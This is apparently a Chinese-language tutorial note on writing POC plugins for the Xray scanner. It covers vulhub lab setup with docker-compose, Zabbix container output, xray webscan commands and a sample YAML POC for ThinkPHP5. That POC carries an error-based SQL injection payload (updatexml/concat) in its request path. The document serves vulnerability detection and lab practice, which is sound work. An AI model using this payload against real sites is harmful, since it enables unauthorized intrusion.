Xray写POC插件
漏洞环境
- https://www.vulnhub.com/
- https://github.com/vulhub/vulhub
- https://github.com/QAX-A-Team/WeblogicEnvironment
启用、关闭命令
# 启用环境
docker-compose up -d
环境关闭
docker-compose down
查看 WEB 应用容器
root@kali:/opt/vulhub/zabbix/CVE-2016-10134# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
b699f35aa2c8 vulhub/zabbix:3.0.3-server "/docker-entrypoint.…" 30 minutes ago Up 30 minutes (unhealthy) 162/udp, 10051/tcp cve-2016-10134_agent_1
05cf05dacf6d vulhub/zabbix:3.0.3-web "/docker-entrypoint.…" 30 minutes ago Up 30 minutes (healthy) 0.0.0.0:8080->80/tcp cve-2016-10134_web_1
be0b0d3e74a7 mysql:5 "docker-entrypoint.s…" 30 minutes ago Up 30 minutes 3306/tcp, 33060/tcp cve-2016-10134_mysql_1
# 意思是容器的80端口映射到主机的8080端口上
0.0.0.0:8080->80/tcp
资料
https://www.runoob.com/docker/docker-container-usage.html
https://github.com/Medicean/VulApps/
POC文档
工具
- https://github.com/chaitin/xray XRay 安全评估工具
- https://phith0n.github.io/xray-poc-generation/ 在线辅助生成 XRay YAML POC
- https://github.com/phith0n/xray-poc-generation 在线辅助生成 XRay YAML POC 源码
参考源码
Xray的POC插件测试
- 只运行单个内置 POC
在 xray 中,所有的 poc 隶属于插件 phantasm, 所以使用 poc 时需要开启 phantasm 插件才可生效。--poc 参数指定本次运行的 poc,如不指定,将运行所有的内置 poc。
xray webscan --plugins phantasm --poc /home/test/1.yaml --url http://example.com/
加载 /home/test/pocs/ 所有的 POC:
xray webscan --plugins phantasm --poc "/home/test/pocs/*"
加载 /home/test/pocs/ 下包含 thinkphp 的 POC
xray webscan --plugins phantasm --poc "/home/test/pocs/*thinkphp*"
- https://paper.seebug.org/9/ 写通用POC需要注意的问题
thinkphp5-in-sqlinjection
name: thinkphp5-in-sqlinjection
rules:
- method: GET
path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1
expression: |
body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
author: 17bdw
Affected Version: "thinkphp5-in-sqlinjection"
vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1"
links:
- https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection